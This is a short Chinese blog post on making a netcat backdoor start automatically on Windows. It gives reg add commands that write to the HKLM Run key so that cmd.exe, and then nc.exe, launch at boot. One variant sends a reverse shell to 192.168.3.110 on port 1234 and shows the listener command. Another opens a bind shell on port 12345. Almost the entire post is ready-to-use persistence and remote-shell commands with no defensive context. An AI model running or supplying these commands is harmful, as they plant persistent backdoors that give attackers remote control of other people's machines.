nc自启动

2019-11-20  本文已影响0人  migrate_
  1. 例如开机自启cmd
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v processname /t reg_sz /d "C:\Windows\System32\cmd.exe" /f
1.jpg 2.jpg
  1. 自启nc反弹shell(一)
#反弹shell
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "processname" /t reg_sz /d "C:\Windows\System32\nc.exe -e cmd.exe 192.168.3.110 1234"
#接收shell
nc -lvvp 1234
  1. 自启nc反弹shell(二)
#反弹shell
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "processname" /t reg_sz /d "C:\Windows\System32\nc.exe -Ldp 12345 -e cmd.exe"
#接收shell
nc ip port 连接
上一篇下一篇

猜你喜欢

热点阅读